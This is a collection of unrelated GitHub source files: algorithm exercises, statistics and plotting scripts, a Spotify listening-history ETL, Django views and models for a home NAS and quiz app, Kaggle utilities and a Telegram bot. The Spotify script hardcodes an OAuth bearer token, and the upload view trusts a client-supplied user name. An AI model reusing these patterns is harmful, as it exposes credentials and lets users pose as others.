+{"seq_id":"31099661600","text":"# -*- coding: utf-8 -*-\n\n# The diameter of a tree is the largest path\n# from a leaf to another leaf.\n# i.e: the largest path from one node\n# to another.\n# The common ancestor may not be the root\n\n\nclass Vertex:\n def __init__(self, label, left=None, right=None):\n self.label = label\n self.left = left\n self.right = right\n\n\ndef _tree_diameter(v, heights):\n if v is None:\n return 0\n left = _tree_diameter(v.left, heights)\n right = _tree_diameter(v.right, heights)\n heights[v] = left + right\n return 1 + max(left, right) # return one more edge\n\n\ndef tree_diameter(v):\n heights = {}\n _tree_diameter(v, heights)\n print(list(heights.values()))\n return max(heights.values())\n\n\n# Longest path is from i to m with b as common ancestor,\n# 8 edges\nt1 = Vertex('a',\n Vertex('b',\n Vertex('d',\n Vertex('f'),\n Vertex('g',\n Vertex('h',\n None,\n Vertex('i')))),\n Vertex('e',\n None,\n Vertex('j',\n Vertex('k'),\n Vertex('l',\n Vertex('m'))))),\n Vertex('c'))\n\n\nprint(tree_diameter(t1))\n","repo_name":"nitely/algo-design-manual-notes","sub_path":"solutions/05_19_tree_diameter.py","file_name":"05_19_tree_diameter.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"71913818089","text":"\"\"\"\r\nRegistration : 012-1111-0461-20\r\nRoll : 203012-21-0008 \r\nDescription : POISSON DISTRIBUTION\r\nAuthor : Chitrak Roychowdhury\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.stats import moment\r\nfrom scipy.special import factorial\r\n\r\n#POISSON DISTRIBUTION\r\n\r\nlamda = 5.0 ;\r\nN = 100000 \r\nP = np.random.poisson(lamda,N);\r\n\r\n#plotting histogram:\r\nn1,bins,patches = plt.hist(P,bins=18,density=True,color='lightgreen',ec='r',label='Poisson Distribution of 100000 \\nrandom numbers')\r\n\r\n#Plotting Poisson distribution for visualisation\r\nplt.plot(bins,(lamda**bins * np.exp(-lamda))/ factorial(bins), linewidth=2, color='k', label='Poisson distribution (Theoretical)')\r\nplt.title('Poisson Distribution')\r\nplt.xlabel('x $ \\longrightarrow $')\r\nplt.ylabel('$P_{poisson}(x)$ $ \\longrightarrow $')\r\nplt.legend()\r\nplt.xlim(-1,18)\r\nplt.grid(True)\r\nplt.show()\r\n\r\n# MOMENTS\r\nK = int(input(\"Calculate moment upto: \"))\r\nfor i in range(1,K+1):\r\n print(\"\\n\\t\\tMoment no: \",i)\r\n moment_no = moment(P,moment = i)\r\n print(\"* mu\",i,\": \",moment_no)\r\n\r\n#Theoretical moment\r\n ThMoment=0\r\n moment_=0\r\n for j in range(1,N):\r\n moment_ = ((P[j]-np.mean(P))**i)/N\r\n ThMoment+=moment_\r\n print(\"* Theoritical value: \",ThMoment)\r\n print( \"* Error =\" , moment_no-ThMoment)\r\n\r\n# CUMULANTS\r\nc1 = moment(P,1)\r\nprint(\"\\n1 st cumulant \",c1)\r\nc2 = np.mean(moment(P,2))-(np.mean(moment(P,1)))**2\r\nprint(\"2 nd cumulant \",c2)\r\nc3 = np.mean(moment(P,3))-(3*(np.mean(moment(P,2))*(np.mean(moment(P,1)))))+(2*np.mean(moment(P,1)**3))\r\nprint(\"3 rd cumulant \",c3)\r\nc4 = np.mean(moment(P,4))-(4*(c3)*(c1))-(3*c2**2)+(12*c2*c1**2)-(6*c1**4)\r\nprint(\"4 th Cumulant \",c4)\r\n","repo_name":"chitrak24/Statistical-Mechanics","sub_path":"Poisson Distribution.py","file_name":"Poisson Distribution.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"26820075998","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\n\ncluster_result = np.zeros(10000)\n\n# 从pickle文件读取降维结果\nwith open(\"./result/part-00000\",\"rb\") as result:\n for i in range(10000):\n line = result.readline()\n cluster_result[i] = int(line)\n\nwith open(\"usdata.pickle\", \"rb\") as usdata:\n data = pickle.load(usdata)\n y = cluster_result[:10000] # 这里,y表示聚类结果(一维向量,list或者numpy.array都可以)\n # y = np.zeros(5000)\n # y = np.append(y, np.ones(5000), 0)\n # y = np.random.randint(0, 5, 10000)\n plt.scatter(data[:, 0], data[:, 1], c=y)\n plt.show()\n","repo_name":"YunFeng0817/bigdata_analyse","sub_path":"lab2/show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"71536857447","text":"\"\"\"\nExtraction that it allows to get the information of my count of Spotify, show them\nwhat i have listed last 24 hours\n\nThe idea is to create the ETL.\n\"\"\"\n\n#import sqlalchemy\nimport pandas as pd \n#from sqlalchemy.orm import sessionmaker\nimport requests\nimport json\nfrom datetime import datetime\nimport datetime\nimport sqlite3\n\n\nDATABASE_LOCATION = \"\"\n\n# Data user SP\n\nUSER_ID = \"carolina.munozce\"\nTOKEN = \"BQBWr-KU7mV9ZBjdi3FXI2FjEL5_klcUVWUUyZnYtfOcuBL19LyEGJk_F1FUYF2bAF55QoJuNVbipCA05X8SBIsk4_faRkBbiXUHlUV0aL9hicTj5zkuqXZlH-Kxk6tPotm5Nw8XQT3lYkECIpNIZIcK2mZs\"\n\ndef check_if_valid_data(df: pd.DataFrame) -> bool:\n #Check if dataframe is empty. In this case, if we don't listen any music on SP\n if df.empty:\n print(\" No songs download. Finish execution\")\n return False\n\n # Primary key check -> For duplicate data\n if pd.Series(df['played_at']).is_unique:\n pass\n else:\n raise Exception(\"Primary key check is violed\")\n\n # Check any null\n #if df.isnull().values.any():\n # raise Exception(\"Null value found\")\n\n # Check that all timestamps are of yesterday's date\n yesterday = datetime.datetime.now() - datetime.timedelta(days=1)\n yesterday = yesterday.replace(hour=0, minute=0, second=0,microsecond=0)\n\n timestamps = df[\"timestamps\"].tolist()\n for timestamp in timestamps:\n if datetime.datetime.strptime(timestamp,\"%Y-%m-%d\") != yesterday:\n raise Exception(\"At least one of the returned songs does not come fron within the last 24 hours\")\n return True\n\nif __name__ == \"__main__\":\n \n headers = {\n \"Accept\": \"application/json\",\n \"Content-Type\": \"application/json\",\n \"Authorization\": \"Bearer {token}\".format(token=TOKEN)\n }\n #Convert unix timestamp in milliseconds\n today =datetime.datetime.now()\n yesterday = today - datetime.timedelta(days=1)\n yesterday_unix_timestamp = int(yesterday.timestamp())* 1000\n\n # Get request from SP last 24 hours\n\n r = requests.get(\"https://api.spotify.com/v1/me/player/recently-played?after={time}\".format(time=yesterday_unix_timestamp), headers = headers)\n\n data = r.json()\n # print (data)\n\n song_names = []\n artist_names = []\n played_at_list = []\n timestamps = []\n\n for song in data[\"items\"]:\n song_names.append(song[\"track\"][\"name\"])\n artist_names.append(song[\"track\"][\"album\"][\"artists\"][0][\"name\"])\n played_at_list.append(song[\"played_at\"])\n timestamps.append(song[\"played_at\"][0:10])\n\n song_dict = {\n \"song_name\": song_names,\n \"artist_names\": artist_names,\n \"played_at\": played_at_list,\n \"timestamps\": timestamps\n }\n\n song_df = pd.DataFrame(song_dict, columns= [\"song_name\",\"artist_name\",\"played_at\",\"timestamps\"])\n \n #Validate the song\n if check_if_valid_data(song_df):\n print(\"Data valid, process to Load stage\")\n\n print (song_df)\n\n ","repo_name":"carolinamunozce/spotify_extraction","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"71681605288","text":"from interface.error import data_no_found\nfrom django.shortcuts import render,redirect,HttpResponse\nfrom user.models import User_Profile,User, Permission\nfrom user_crap.models import user_crap\nfrom .error import data_no_found\nfrom .utily import REQUEST\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.views.decorators.clickjacking import xframe_options_sameorigin\nfrom .models import HOME_PAGE_IMAGE,HOME_PAGE_ARTICALSE\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse\n\n\n\n\n# Create your views here\n\n\n\n#1\ndef home(request):\n # return HttpResponse(\"hello world\")\n req = REQUEST(request)\n imgs = list(HOME_PAGE_IMAGE.objects.all())\n articles = list(HOME_PAGE_ARTICALSE.objects.all())\n img = None\n try:\n img = imgs[0]\n imgs = imgs[1:]\n except:\n imgs = None\n img = None\n return render(request,\"home.html\",{\"pg_no\":1,\"imgs\":imgs,\"img\":img,\"toggle\":0,\"articles\":articles})\n\n\n\"\"\"____________\"\"\"\n#2 comes under appstore\ndef upload(request):\n req = REQUEST(request)\n objs = list()\n for oj in user_crap.objects.all():\n objs.append(oj.title)\n objs = set(objs)\n if req.LOGIN_LOGOUT().is_login():\n # if request.method == \"POST\":\n # user = request.POST.get(\"user\")\n # title = request.POST.get(\"title\")\n # file = request.FILES.get(\"file\")\n # decs = request.POST.get(\"decs\")\n # data_type = request.POST.get(\"data_type\")\n # if user != None and title != None and file != None and decs != None and data_type != None:\n # try:\n # print(type(file))\n # user_crap.objects.create(user=user,title=title,data=file,decs=decs,type_data=data_type)\n # return req.SUCCESS().success(f\"your data is uploaded file name:-{file} and title:-{title}\",req=None,upload=True,appstore=True)\n # except Exception as e:\n # print(e)\n # return req.ERROR().error(\"Some thimg went wrong\")\n # pass\n # else:\n # return req.ERROR().error(\"Some feilds are missing\")\n # # print(user,title,file,decs)\n if request.is_ajax():\n user = request.POST.get(\"user\")\n title = request.POST.get(\"title\")\n file = request.FILES.get(\"file\")\n decs = request.POST.get(\"decs\")\n data_type = request.POST.get(\"data_type\")\n if user != None and title != None and file != None and decs != None and data_type != None:\n try:\n # print(type(file))\n user_crap.objects.create(user=user,title=title,data=file,decs=decs,type_data=data_type)\n return req.SUCCESS().success(f\"your data is uploaded file name:-{file} and title:-{title}\",req=None,upload=True,appstore=True)\n except Exception as e:\n print(e)\n return req.ERROR().error(\"Some thimg went wrong\")\n pass\n else:\n return req.ERROR().error(\"Some feilds are missing\")\n # print(user,title,file,decs)\n else:\n return req.ERROR().error(\"you have to login first\")\n return render(request,\"upload.html\",{\"pg_no\":2,\"user\":str(request.user),\"objs\":objs})\n#2\ndef appstore(request):\n req = REQUEST(request)\n flag = 0\n data_type = [\"app\",\"music\",\"pdf\",\"doc\",\"video\",\"compress_file\",\"image\"]\n objs = list(user_crap.objects.all())[-100:]\n items = list()\n for oj in user_crap.objects.all():\n items.append(oj.title)\n items = set(items)\n items = list(items)\n items.extend(data_type)\n \n if request.method == \"POST\":\n item = request.POST.get(\"search\")\n copy = item\n if copy.lower() in data_type:\n temp = user_crap.objects.filter(type_data__contains=item)\n else:\n temp = user_crap.objects.filter(title__contains=item)\n objs = list(temp)\n try:\n objs[0]\n print(\" \")\n except:\n flag += 1\n \n if flag != 0:\n return req.ERROR().error(\"No data found\")\n\n return render(request,\"appstore.html\",{\"pg_no\":2,\"objs\":objs,\"items\":items})\n\n#2\n@xframe_options_sameorigin\ndef show_data(request):\n req = REQUEST(request)\n if request.method == \"POST\":\n ID = request.POST.get(\"id\")\n \n if ID != None:\n data = user_crap.objects.get(id = ID)\n \n return render(request,\"ysdfgjdgsj.html\",{\"pg_no\":2,\"data\":data})\n else:\n return req.ERROR().error(\"This page is not ment to use in this way\")\n\"\"\"____________\"\"\"\n\n#3\ndef signup(request):\n req = REQUEST(request)\n if req.LOGIN_LOGOUT().is_login():\n return req.ERROR().error(\"You are already login in for sign up you have to logout\")\n\n if request.method == \"POST\":\n # username = request.POST.get(\"username\")\n # password = request.POST.get(\"password\")\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('login')\n else:\n form = UserCreationForm()\n return render(request,\"signup.html\",{\"pg_no\":3,\"form\":form})\n# 2\n# audio\n# @csrf_exempt\n# def audio(request):\n# if request.method == \"POST\":\n# obj_id = request.POST.get('obj_id')\n# return HttpResponse(\"audio\")\n\n#4\ndef login(request):\n req = REQUEST(request)\n if req.LOGIN_LOGOUT().is_login():\n return redirect(\"home\")\n\n\n if request.method == \"POST\":\n username = request.POST.get(\"username\")\n password = request.POST.get(\"password\")\n if len(username) == 0 or len(password) == 0:\n # print(\"hello\")\n return req.ERROR().error(\"username or password is empty\")\n else:\n if(req.LOGIN_LOGOUT().user_login(username,password)):\n user = req.LOGIN_LOGOUT().ret_user()\n return req.SUCCESS().success(\"you are login\",user.is_superuser)\n else:\n return req.ERROR().error(\"Login not successful\")\n \n return render(request,\"login.html\",{\"pg_no\":4})\n\n\n\ndef logout(request):\n req = REQUEST(request)\n if req.LOGIN_LOGOUT().user_logout():\n return req.SUCCESS().success(\"you are logout\")\n else:\n return req.ERROR().error(\"Your are not login\")\n\n","repo_name":"anshjoseph/home-nas","sub_path":"HOME_NAS/interface/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6461,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"38518399104","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed May 17 23:07:54 2017\r\n\r\n@author: vrtjso\r\n\"\"\"\r\nimport numpy as np\r\nimport pandas as pd\r\nimport random\r\nfrom operator import le, eq\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn import model_selection, preprocessing\r\n\r\ndef RMSLE(y, yfit):\r\n n = len(y)\r\n s = 0\r\n for i in range(0,n):\r\n s += (np.log(yfit[i] + 1) - np.log(y[i] + 1)) ** 2\r\n RMSLE = np.sqrt(s/n)\r\n return RMSLE\r\n\r\n\r\n#Objective function used for xgb\r\ndef objective(yfit, dtrain):\r\n y = dtrain.get_label()\r\n g = 2 * (np.log(yfit + 1) - np.log(y + 1)) / (yfit + 1)\r\n h = (2 - 2 * np.log(yfit + 1) + 2 * np.log(y + 1)) / ((yfit + 1) ** 2)\r\n #n = dtrain.num_row()\r\n #g = []\r\n #h = []\r\n #for i in range(0,n):\r\n # g.append(2 * (np.log(yfit[i] + 1) - np.log(y[i] + 1)) / (yfit[i] + 1))\r\n # h.append((2 - 2 * np.log(yfit[i] + 1) + 2 * np.log(y[i] + 1)) / ((yfit[i] + 1) ** 2))\r\n return g, h\r\n\r\n#Metric used for xgb cv\r\ndef eval_metric(yfit, dtrain):\r\n y = dtrain.get_label()\r\n return 'error', RMSLE(y,yfit)\r\n\r\ndef CreateOutput(prediction):\r\n output = pd.read_csv('test.csv')\r\n output = output[['id']]\r\n output['price_doc'] = prediction\r\n output.to_csv('Submission.csv',index=False)\r\n \r\n \r\n#load data\r\ndef loadTraindata(takeLog=True):\r\n #filename = 'train.csv'\r\n filename = 'train_featured.csv'\r\n rawDf = pd.read_csv(filename)\r\n Ytrain = rawDf['price_doc'].values\r\n Xtrain = rawDf.drop(['price_doc','w'], 1).values\r\n return Ytrain, Xtrain\r\n\r\ndef loadTestdata():\r\n #filename = 'test.csv'\r\n filename = 'test_featured.csv'\r\n rawDf = pd.read_csv(filename)\r\n Xtest = rawDf.values\r\n return Xtest\r\n\r\n#load random small part of data for fast model testing\r\ndef loadSample(n=300):\r\n #filename = 'train.csv'\r\n #filename = 'train_cleaned.csv'\r\n filename = 'train_featured.csv'\r\n size = pd.read_csv(filename).shape[0]\r\n skip = sorted(random.sample(range(1,size+1),size-n))\r\n rawDf = pd.read_csv(filename, skiprows = skip)\r\n\r\n Ytrain = rawDf['log_price'].values\r\n Xtrain = rawDf.drop(['log_price'], 1).values\r\n return Ytrain, Xtrain\r\n\r\n#Used to undersample strange values\r\ndef sample_vals(df, price_value, ratio, condition):\r\n indices = condition(df.price_doc, price_value) & (df.product_type == 0)\r\n df_resampled = df.loc[indices].sample(frac=ratio)\r\n df_remaining = df.loc[~indices]\r\n df_new = pd.concat([df_resampled, df_remaining], axis=0)\r\n return df_new\r\n\r\n#Encoding dummy variables\r\ndef Encoding(TestEncoding = True):\r\n filename = 'test.csv' if TestEncoding else 'train.csv'\r\n rawDf = pd.read_csv(filename)\r\n \r\n #Drop variable with no use and small variance, and sub area\r\n rawDf = rawDf.drop([\"id\",\"ID_metro\",\"ID_railroad_station_walk\",\"ID_railroad_station_avto\",\r\n \"ID_big_road1\", \"ID_big_road2\", \"ID_railroad_terminal\", \"ID_bus_terminal\"],1)\r\n rawDf = rawDf.drop([\"culture_objects_top_25_raion\",\"oil_chemistry_raion\",\"railroad_terminal_raion\",\r\n \"nuclear_reactor_raion\", \"build_count_foam\", \"big_road1_1line\",\"railroad_1line\",\r\n \"office_sqm_500\", \"trc_sqm_500\", \"cafe_count_500_price_4000\", \"cafe_count_500_price_high\",\r\n \"mosque_count_500\", \"leisure_count_500\", \"office_sqm_1000\", \"trc_sqm_1000\",\r\n \"cafe_count_1000_price_high\", \"mosque_count_1000\", \"cafe_count_1500_price_high\",\r\n \"mosque_count_1500\", \"cafe_count_2000_price_high\"],1)\r\n #rawDf = rawDf.drop('sub_area',1)\r\n \r\n result = rawDf\r\n for i in range(1,rawDf.shape[1]): #Do not encode timestamp\r\n if rawDf.ix[:,i].dtype == np.object:\r\n varName = rawDf.columns[i]\r\n if varName == 'sub_area':\r\n dummy_ranks = pd.get_dummies(rawDf[varName], prefix = varName)\r\n else:\r\n dummy_ranks = pd.get_dummies(rawDf[varName], prefix = varName, drop_first=True)\r\n result = pd.concat([result, dummy_ranks], axis=1)\r\n result = result.drop(varName, 1)\r\n varName = 'material' #special case\r\n dummy_ranks = pd.get_dummies(rawDf[varName], prefix = varName)\r\n result = pd.concat([result, dummy_ranks], axis=1)\r\n result = result.drop(varName, 1)\r\n outputFile = 'test_encoded.csv' if TestEncoding else 'train_encoded.csv'\r\n result.to_csv(outputFile,index=False)\r\n #return result\r\n\r\n#用PCA合并同一个系列高度相关的feature\r\ndef FeatureCombination(Df,s='',num_feature=2): \r\n feature_set = []\r\n for c in Df.columns:\r\n if c.startswith(s): feature_set.append(c)\r\n print('combining', len(feature_set), 'features')\r\n data = Df[feature_set].values\r\n\r\n for c in Df.columns:\r\n if Df[c].dtype == 'object':\r\n lbl = preprocessing.LabelEncoder()\r\n lbl.fit(list(Df[c].values))\r\n Df[c] = lbl.transform(list(Df[c].values))\r\n \r\n imp = preprocessing.Imputer()\r\n data = imp.fit_transform(data)\r\n data = preprocessing.scale(data)\r\n pca = PCA(num_feature)\r\n pca.fit(data)\r\n print('explained_variance_ratio_:', pca.explained_variance_ratio_)\r\n trans = pca.transform(data)\r\n for i in range(0,num_feature):\r\n Df[s+'_%d'%(i+1)] = trans[:,i]\r\n Df.drop(feature_set,1,inplace=True)\r\n return Df","repo_name":"LenzDu/Kaggle-Competition-Sberbank","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":5320,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"53"}
+{"seq_id":"20556965249","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n STR_DATE_CREATED = b'date created'\n STR_DATE_UPDATED = b'date updated'\n STR_QUIZ_QUESTION = 'quiz.Question'\n STR_QUIZ_QUIZ = 'quiz.Quiz'\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Question',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('created_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=STR_DATE_CREATED)),\n ('lastupdated_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=STR_DATE_UPDATED)),\n ('title', models.TextField()),\n ('type', models.CharField(default=b'multichoice',\n max_length=15,\n choices=[(b'multichoice',\n b'Multiple choice'),\n (b'shortanswer'\n b'Short answer'),\n (b'matching',\n b'Matching'),\n (b'numerical',\n b'Numerical'),\n (b'multiselect',\n b'Multiple select'),\n (b'description',\n b'Information only'),\n (b'essay',\n b'Essay question')])),\n ('owner', models.ForeignKey(to=settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'Question',\n 'verbose_name_plural': 'Questions',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='QuestionProps',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ('value', models.TextField(blank=True)),\n ('question', models.ForeignKey(to=STR_QUIZ_QUESTION,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'QuestionProp',\n 'verbose_name_plural': 'QuestionProps',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='Quiz',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('created_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=STR_DATE_CREATED)),\n ('lastupdated_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=STR_DATE_UPDATED)),\n ('draft', models.BooleanField(default=False)),\n ('deleted', models.BooleanField(default=False)),\n ('title', models.TextField()),\n ('description', models.TextField(blank=True)),\n ('owner', models.ForeignKey(to=settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'Quiz',\n 'verbose_name_plural': 'Quizzes',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='QuizAttempt',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('attempt_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=b'date attempted')),\n ('submitted_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=b'date submitted')),\n ('score', models.DecimalField(max_digits=6,\n decimal_places=2)),\n ('maxscore', models.DecimalField(max_digits=6,\n decimal_places=2)),\n ('ip', models.IPAddressField()),\n ('instance_id', models.CharField(max_length=50,\n null=True,\n blank=True)),\n ('agent', models.TextField(blank=True)),\n ('quiz', models.ForeignKey(to=STR_QUIZ_QUIZ,\n on_delete=models.CASCADE)),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'QuizAttempt',\n 'verbose_name_plural': 'QuizAttempts',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='QuizAttemptResponse',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('score', models.DecimalField(max_digits=6,\n decimal_places=2)),\n ('text', models.TextField(blank=True)),\n ('question', models.ForeignKey(to=STR_QUIZ_QUESTION,\n on_delete=models.CASCADE)),\n ('quizattempt', models.ForeignKey(to='quiz.QuizAttempt',\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'QuizAttemptResponse',\n 'verbose_name_plural': 'QuizAttemptResponses',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='QuizProps',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ('value', models.TextField(blank=True)),\n ('quiz', models.ForeignKey(to=STR_QUIZ_QUIZ,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'QuizProp',\n 'verbose_name_plural': 'QuizProps',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='QuizQuestion',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('order', models.IntegerField(default=1)),\n ('question', models.ForeignKey(to=STR_QUIZ_QUESTION,\n on_delete=models.CASCADE)),\n ('quiz', models.ForeignKey(to=STR_QUIZ_QUIZ,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'QuizQuestion',\n 'verbose_name_plural': 'QuizQuestions',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='Response',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('created_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=STR_DATE_CREATED)),\n ('lastupdated_date',\n models.DateTimeField(default=django.utils.timezone.now,\n verbose_name=STR_DATE_UPDATED)),\n ('score', models.DecimalField(default=0,\n max_digits=6,\n decimal_places=2)),\n ('title', models.TextField()),\n ('order', models.IntegerField(default=1)),\n ('owner', models.ForeignKey(to=settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE)),\n ('question', models.ForeignKey(to=STR_QUIZ_QUESTION,\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'Response',\n 'verbose_name_plural': 'Responses',\n },\n bases=(models.Model, ),\n ),\n migrations.CreateModel(\n name='ResponseProps',\n fields=[\n ('id', models.AutoField(verbose_name='ID',\n serialize=False,\n auto_created=True,\n primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ('value', models.TextField(blank=True)),\n ('response', models.ForeignKey(to='quiz.Response',\n on_delete=models.CASCADE)),\n ],\n options={\n 'verbose_name': 'ResponseProp',\n 'verbose_name_plural': 'ResponseProps',\n },\n bases=(models.Model, ),\n ),\n migrations.AddField(\n model_name='quiz',\n name='questions',\n field=models.ManyToManyField(to=STR_QUIZ_QUESTION,\n through='quiz.QuizQuestion'),\n preserve_default=True,\n ),\n ]\n","repo_name":"DigitalCampus/django-oppia","sub_path":"quiz/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":11507,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"}
+{"seq_id":"25122188394","text":"# Bu araç @keyiflerolsun tarafından | @KekikAkademi için yazılmıştır.\n\nfrom telethon import TelegramClient\nfrom telethon.sessions import StringSession\nfrom telethon.errors.rpcerrorlist import MediaEmptyError\n\nfrom contextlib import suppress\nfrom json import loads\nfrom aiofiles import open\nfrom os import environ, path\nfrom veri_ver import a101_brosurler\n\nclient = TelegramClient(\n session = StringSession(),\n api_id = int(environ.get(\"TG_API_ID\")),\n api_hash = environ.get(\"TG_API_HASH\")\n).start(bot_token = environ.get(\"TG_BOT_TOKEN\"))\n\nasync def aktuel_robot():\n if path.isfile(\"A101.json\"):\n async with open(\"A101.json\", \"r+\", encoding=\"utf-8\") as dosya:\n eski_veriler = loads(await dosya.read())\n else:\n eski_veriler = {}\n\n yeni_veriler = await a101_brosurler()\n\n for anahtar, resimler in yeni_veriler.items():\n if not resimler:\n continue\n\n eski_resimler = eski_veriler.get(anahtar, [])\n yeni_resimler = [resim for resim in resimler if resim not in eski_resimler]\n\n for resim in yeni_resimler:\n try:\n await client.send_file(int(environ.get(\"TG_MESAJ_ID\")), resim, caption=f\"**{anahtar}**\")\n except Exception as hata:\n print(f\"Resim : {resim}\")\n print(f\"Hata : {type(hata).__name__} - {hata}\")\n\nif __name__ == \"__main__\":\n with client:\n client.loop.run_until_complete(aktuel_robot())","repo_name":"keyiflerolsun/A101AktuelRobot","sub_path":"basla.py","file_name":"basla.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"tr","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"}
+{"seq_id":"2490615892","text":"from django.contrib import admin\nfrom django.contrib.auth import forms\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.contrib.auth.base_user import BaseUserManager\n# Register your models here.\n\nfrom .models import User, UserProfile, EmployeeIDInformation, EmployeeNextOfKin, EmployeeMaritalInformation, EmployeeDependants, EmployeeBankInformation\nfrom .forms import UserCreationForm, UserChangeForm, RegistrationForm\n\nemployeeModels = [EmployeeIDInformation, EmployeeNextOfKin, EmployeeMaritalInformation, EmployeeDependants, EmployeeBankInformation]\n\nclass EmployeeBankInformationInline(admin.StackedInline):\n model = EmployeeBankInformation\n can_delete = False\n verbose_plural_name =\"Employee Bank Information\"\n foreignkey_name = 'staffID'\n\nclass EmployeeDependantsInline(admin.StackedInline):\n model = EmployeeDependants\n can_delete = False\n verbose_plural_name =\"Employee Dependants Information\"\n foreignkey_name = 'staffID'\n\nclass EmployeeMaritalInformationInline(admin.StackedInline):\n model = EmployeeMaritalInformation\n can_delete = False\n verbose_plural_name =\"Employee Marital Information\"\n foreignkey_name = 'staffID'\n\nclass EmployeeNextOfKinInline(admin.StackedInline):\n model = EmployeeNextOfKin\n can_delete = False\n verbose_plural_name =\"Employee Next of Kin Information\"\n foreignkey_name = 'staffID'\n\nclass EmployeeIDInformationInline(admin.StackedInline):\n model = EmployeeIDInformation\n can_delete = False\n verbose_plural_name =\"Employee ID Information\"\n foreignkey_name = 'staffID'\n\nclass UserProfileInline(admin.StackedInline):\n model = UserProfile\n can_delete = False\n verbose_plural_name =\"User Profile\"\n foreignkey_name = 'user'\n\nclass CustomUserAdmin(UserAdmin):\n model = User\n form = UserChangeForm\n add_form = UserCreationForm\n\n list_display = ('email', 'first_name', 'last_name', 'username', 'phone_number', 'is_staff', 'is_superuser', 'date_of_birth')\n # inlines = (EmployeeIDInformationInline,)\n inlines = (UserProfileInline, EmployeeIDInformationInline, EmployeeNextOfKinInline, EmployeeMaritalInformationInline, \n EmployeeDependantsInline, EmployeeBankInformationInline,)\n list_filter = ['is_superuser']\n\n add_fieldsets = UserAdmin.add_fieldsets + (\n ('Personal Information',\n {'fields':(\n 'email',\n ('first_name', 'middle_name', 'last_name', 'date_of_birth', 'gender')\n , 'phone_number', 'city','country',)\n }),\n ('Company Information',{\n 'fields':(\n 'is_staff', 'is_superuser','is_active',\n )\n }),\n )\n\n fieldsets = UserAdmin.fieldsets + (\n ('Personal Information', \n 